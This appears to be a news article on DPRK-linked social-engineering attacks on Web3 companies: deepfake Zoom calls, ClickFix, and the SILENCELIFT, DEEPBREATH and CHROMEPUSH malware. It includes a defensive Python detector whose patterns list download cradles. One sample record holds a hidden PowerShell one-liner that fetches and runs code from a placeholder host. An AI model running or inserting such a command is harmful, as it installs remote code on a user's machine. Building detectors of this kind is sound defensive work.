Evolution of Cyber Threats: Web3 Under Fire
The cryptocurrency sector and the fintech industry are facing a new wave of high-tech attacks. According to the latest report from Mandiant, hacking groups allegedly linked to the DPRK have significantly upgraded their arsenal. The primary focus has shifted from direct protocol breaches to complex social engineering and the use of innovative malware.
To collect data covertly, attackers have begun using tooling of the UNC1069 calibre, which lets them remain undetected inside corporate networks for years.
Deepfakes and Zoom Traps: How the New Schemes Work
Modern hackers have abandoned simple phishing emails in favor of personalized contacts. The attack scheme looks as follows:
Social Media Contact: Using compromised accounts of real people, criminals reach out to employees of Web3 companies.
Video Conference: The victim is invited to a Zoom meeting where deepfakes — realistic digital masks mimicking the appearance of trusted individuals — are used.
Technical Manipulation: Under the pretext of "audio issues," hackers convince the victim to follow specific instructions. This method is known as ClickFix.
During these manipulations, the user unknowingly enters commands that activate hidden malicious scripts in their system.
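A defender-side illustration added here, not code from the article or from Mandiant's report: a heuristic over constructed process-creation records that flags a command interpreter launched from the user's own desktop session (the way a pasted "fix" command would be) whose command line carries the traits of such one-liners. The field names, the parent-process assumption (explorer.exe) and the sample records are all assumptions for the example.

```python
"""Heuristic ClickFix-style detection over process-creation telemetry.
Assumed Sysmon/EDR-like fields: image, parent_image, command_line."""
import re

# Parent that indicates the user typed or pasted the command themselves (assumption).
USER_LAUNCH_PARENTS = {"explorer.exe"}
# Interpreters typically handed a one-liner by the victim.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "wscript.exe", "cscript.exe"}
# Traits of a pasted one-liner: hidden window, encoded payload, download cradle.
SUSPICIOUS_PATTERNS = [
    re.compile(r"-(?:w|windowstyle)\s+hidden", re.I),
    re.compile(r"-(?:e|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I),
    re.compile(r"(?:iwr|invoke-webrequest|curl|wget|downloadstring)", re.I),
    re.compile(r"https?://", re.I),
    re.compile(r"(?:iex|invoke-expression)", re.I),
]

def score_event(event):
    """Return (score, reasons) for one process-creation record."""
    reasons = []
    image = event.get("image", "").lower().rsplit("\\", 1)[-1]
    parent = event.get("parent_image", "").lower().rsplit("\\", 1)[-1]
    if image not in INTERPRETERS:
        return 0, reasons
    if parent in USER_LAUNCH_PARENTS:
        reasons.append("interpreter launched from user desktop session")
    cmdline = event.get("command_line", "")
    for pat in SUSPICIOUS_PATTERNS:
        if pat.search(cmdline):
            reasons.append(f"command line matches /{pat.pattern}/")
    return len(reasons), reasons

def flag_clickfix(events, threshold=3):
    """Return the events whose score reaches the threshold, with reasons."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append({"event": ev, "score": score, "reasons": reasons})
    return hits

# Constructed sample records (not real telemetry); the URL is a placeholder.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": 'powershell -w hidden -c "iex (iwr http://placeholder.invalid/fix)"'},
    {"image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "cmd /c dir"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Program Files\Updater\updater.exe",
     "command_line": r"powershell -File C:\scripts\inventory.ps1"},
]
```

Only the first sample scores above the threshold; a plain `cmd /c dir` from the desktop and a scheduled script run by a service binary are left alone, which is the balance a production rule has to strike.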
Technical Arsenal: SILENCELIFT, DEEPBREATH, and CHROMEPUSH
Cybersecurity specialists have identified three new types of malware actively used in recent attacks.
Malware Characteristics
SILENCELIFT, DEEPBREATH, and CHROMEPUSH are next-generation tools designed to:
Extract deep system information;
Steal credentials and access keys;
Bypass the defense mechanisms of modern operating systems.
The distinctive feature of these programs is their "invisibility": they can operate inside an IT infrastructure without obvious signs of presence, collecting data in real time.
The Role of Artificial Intelligence in Attacks
The UNC1069 group, known since 2018, made a qualitative leap at the end of 2025. Researchers note that hackers have begun actively using Artificial Intelligence tools to automate their attacks. This has not only increased the efficiency of "processing" victims but also significantly complicated the process of detecting malicious code by traditional antivirus means.
Who is at Risk and How to Stay Protected?
The high-risk zone includes:
Crypto companies and exchanges;
Software developers in the Web3 space;
Venture capital funds and investment organizations.
Safety Recommendations
To minimize risks, experts strongly recommend strengthening communication controls. Businesses benefit from switching to multi-factor authentication and implementing identity-verification protocols for any technical request made during video calls. Remember: no legitimate service will ever require you to enter system commands to "fix audio" in Zoom.